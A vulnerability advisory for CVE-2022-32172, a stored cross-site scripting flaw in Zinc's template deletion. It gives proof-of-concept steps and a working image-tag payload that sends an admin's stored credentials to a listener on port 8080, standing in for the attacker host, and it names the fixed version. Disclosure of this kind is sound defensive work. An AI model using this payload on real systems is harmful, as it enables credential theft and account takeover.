CVE-2022-32172

Overview

In Zinc, versions v0.1.9 through v0.3.1 are vulnerable to Stored Cross-Site Scripting when using the delete template functionality. When an authenticated user deletes a template with a XSS payload in the name field, the Javascript payload will be executed and allow an attacker to access the user’s credentials.

Details

Zinc is vulnerable to Stored Cross-Site Scripting in the delete template functionality. When an authenticated user deletes a template with a XSS payload in the name field, the Javascript payload will be executed. When the payload contains a request to the attacker’s domain, the credentials of the user who deleted the template will be sent encoded in base64 to the attacker, and then the attacker will get access to the site on behalf of the user.

PoC Details

1. Log in to the application as a user and create a new template.
2. Enter the XSS payload provided in the PoC section below in the template name field, fill in the other fields, and save the template.
3. Start a listener on port 8080 to receive the victim's credentials.
4. Now login as an admin user and navigate to the created template.
5. Under the actions tab, click on the delete button.
6. The javascript payload will be executed, and the admin’s credentials encoded in base64 will be sent to the attacker.

PoC Code

"><img src=x onerror=this.a=window.location.href.slice(0,7);this.src=this.a+'127.0.0.1:8080'+this.a[6]+'x='+localStorage.getItem("creds")>

Affected Environments

Zinc versions v0.1.9 through v0.3.1

Prevention

Upgrade to zinc version v0.3.2